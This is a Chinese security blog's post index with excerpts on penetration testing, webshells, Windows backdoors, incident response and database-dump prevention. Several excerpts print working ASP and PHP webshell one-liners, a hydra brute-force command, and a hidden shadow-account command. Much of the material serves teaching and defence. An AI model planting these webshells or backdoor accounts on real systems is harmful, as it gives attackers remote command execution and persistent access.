上一页 1 2 3 4 5 6 ··· 8 下一页
2023年3月10日
一句话shell总结及开启3389端口
摘要: ASP一句话: <%execute(request("aaa"))%> <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%><%eval request("aaa")%> PHP一句话 阅读全文
posted @ 2023-03-10 10:16 田家少闲月- 阅读(200) 评论(0) 推荐(0) 编辑
渗透测试工具使用总结
摘要: 1.hydra[海德拉]: 密码能否被破解,关键取决于字典是否强大, 使用: hydra -L user -P passlist.txt ftp://192.168.0.1 暴力破解的防御 useradd shell #对于不需要登录的用户,在新建用户的时候可以加入" -s /sbin/nologi 阅读全文
posted @ 2023-03-10 10:11 田家少闲月- 阅读(190) 评论(0) 推荐(0) 编辑
2023年3月7日
Linux基础命令使用
摘要: 1.CentOS 安装和卸载Python3 卸载python3 rpm -qa|grep python3|xargs rpm -ev --allmatches --nodeps 卸载pyhton3 whereis python3 |xargs rm -frv 删除所有残余文件 whereis pyt 阅读全文
posted @ 2023-03-07 15:42 田家少闲月- 阅读(45) 评论(0) 推荐(0) 编辑
2022年9月25日
数据拖库安全防范
摘要: 拖库个人防范策略及技术 分级管理密码,涉及隐私的,一账号一密码,密码无关联 使用强密码,至少14位,字母大小写组合 定期修改密码 邮箱不宜注册为网络账号 不让计算机自动保存密码,不随意在第三方网站输入自己的密码 安装杀毒软件和防火墙 公司网站拖库安全防范 可以通过数据库安全防护技术解决,数据库安全技 阅读全文
posted @ 2022-09-25 20:32 田家少闲月- 阅读(43) 评论(0) 推荐(0) 编辑
渗透信息收集
摘要: 信息搜集 一般企业级的操作,就是先用扫描器扫描 IBM Appscan HP Weblnspect 启明星辰 天镜 安恒 明鉴 绿盟 远程安全评估系统(WVSS/RSAS) 其他 Nmap等 DNS域传送漏洞(域名探测的过程) 根据主域名,可获得二级域名,三级域名 Kali内置的DNS的枚举器 dn 阅读全文
posted @ 2022-09-25 20:31 田家少闲月- 阅读(89) 评论(0) 推荐(0) 编辑
数据库基本操作及预防拖库
摘要: 数据库基本操作1.数据库基本操作命令(1).显示所有数据库并查询当前使用的数据库show databases; //显示所有的数据库select databases(); //查询当前使用的数据库(2).创建数据库create [数据库名称];(3).选择数据库use [数据库名称];(4).直接删 阅读全文
posted @ 2022-09-25 20:27 田家少闲月- 阅读(290) 评论(0) 推荐(0) 编辑
windows操作系统后门
摘要: 影子账户 创建隐藏账户的方式: 创建一个隐藏账户"net user test$ password /add",隐藏账户无法使用"net user"命令查看,但是可以在"本地用户和组"里面查看。 打开注册表"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/User 阅读全文
posted @ 2022-09-25 20:25 田家少闲月- 阅读(386) 评论(0) 推荐(0) 编辑
应急响应(总)
摘要: 为了应各种意外事件,保证将损失降到最低,事件的主题可能来自自然界、系统自身故障,组织内部或外部的人、计算机病毒或蠕虫等 应急响应的三要素: 信息系统的重要程度 信息系统的损失程度 事件的影响 应急响应的管理六要素: 提供解决方案 对系统进行查漏补缺 明确司法途径 明确应急的意图 还原攻击 保障业务的 阅读全文
posted @ 2022-09-25 20:22 田家少闲月- 阅读(187) 评论(0) 推荐(0) 编辑
应急响应(WEB)
摘要: webshell以及暗链: webshell:web的一个后门,能被web可执行的,可操控的程序。 攻击网站的流程: 信息探测 注入/XSS 获取数据 破解密码 登录后台 上传webshell 提权控制服务器 渗透内网 经典webshell: <?php echo system($_get[cmd] 阅读全文
posted @ 2022-09-25 20:18 田家少闲月- 阅读(39) 评论(0) 推荐(0) 编辑
Linux入侵排查
摘要: IP及版本 IP地址 版本信息 系统内核版本 系统发行版本 ARP ARP表 ARP攻击 端口情况 开放端口 TCP开放端口 UDP开放端口 TCP高危端口 UDP高危端口 网络连接 网卡模式 自启动项 用户自定义启动项 系统自启动项 定时任务 系统定时任务 时间看系统定时任务 分析可疑系统定时任务 阅读全文
posted @ 2022-09-25 20:09 田家少闲月- 阅读(35) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 ··· 8 下一页